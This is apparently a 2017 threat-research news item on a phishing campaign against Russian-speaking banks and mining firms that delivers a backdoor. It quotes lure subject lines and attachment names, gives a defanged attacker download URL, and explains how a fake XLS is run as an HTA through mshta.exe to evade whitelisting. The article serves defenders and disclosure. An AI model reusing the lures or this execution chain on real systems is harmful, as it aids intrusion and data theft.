Security News Backdoor-carrying Emails Set Sights on Russian-speaking Businesses

[LASER_oneXM]

A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.

We’ve observed at least five runs from June 23 to July 27, 2017, each of which sent several malicious emails per target. Affected industries were financial institutions, including banks, and mining firms. Of note is how the attackers diversified their tactic—sending different emails for each run, per target.

The infection chain starts with emails with addresses designed to make it look like they’re from actual sales and billing departments. One sample we found used the subject line, Правила подключения к шлюзу, which translates to “Rules for connecting to the gateway.” Another has the subject line, Оплата госпошлин, which means “Payment of state duties.”

These emails contain an attachment that takes the form of a .DOC file with various file names. Two of the file names we’ve seen used are Инструкция для подключения клиентов.doc (Instructions for connecting clients) and Заявление на оплату услуги .doc (Application for payment of the service).

The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.

This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.